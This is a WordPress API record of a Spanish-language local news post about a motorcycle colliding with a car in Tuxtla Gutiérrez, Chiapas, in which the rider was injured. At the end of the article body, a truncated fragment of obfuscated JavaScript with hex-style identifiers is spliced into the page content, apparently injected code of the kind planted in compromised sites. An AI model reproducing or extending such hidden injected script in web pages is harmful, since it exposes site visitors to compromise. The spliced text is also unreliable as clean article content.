{"id":17785,"date":"2024-09-10T05:48:42","date_gmt":"2024-09-10T05:48:42","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17785"},"modified":"2024-09-10T05:48:43","modified_gmt":"2024-09-10T05:48:43","slug":"motociclista-se-estrello-contra-particular","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17785","title":{"rendered":"Motociclista se estrell\u00f3 contra particular"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0040-1024x576.jpg\" alt=\"\" class=\"wp-image-17786\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0040-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0040-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0040-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0040-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240909-WA0040-2048x1152.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 9 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista se estrell\u00f3 contra un Kia R\u00edo de color azul, cuando circulaba sobre el Libramiento Norte, a la altura de la Calle R\u00edo Lacant\u00fan.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cerca de las 14:30 horas cuando el motociclista circulaba en una Treck doble prop\u00f3sito, en el carril de baja de Oriente a Poniente y que el coche le cerr\u00f3 el paso.<\/p>\n\n\n\n<p>En el lugar la conductora del autom\u00f3vil dijo que la moto apareci\u00f3 de manera repentina y no pudo frenar.<\/p>\n\n\n\n<p>Por el golpe, el conductor de la moto result\u00f3 con diferentes heridas y fue atendido por param\u00e9dicos de la Cruz Roja Mexicana.<\/p>\n\n\n\n<p>Al no haber un acuerdo armonioso, las dos unidades fueron puestas a disposici\u00f3n del Ministerio P\u00fablico para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 9 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista se estrell\u00f3 contra un Kia R\u00edo de color azul, cuando circulaba sobre el Libramiento Norte, a la altura de la Calle R\u00edo Lacant\u00fan. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cerca de las 14:30 horas cuando el motociclista circulaba en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17786,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-17785","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17785","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17785"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17785\/revisions"}],"predecessor-version":[{"id":17787,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17785\/revisions\/17787"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17786"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17785"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17785"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17785"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}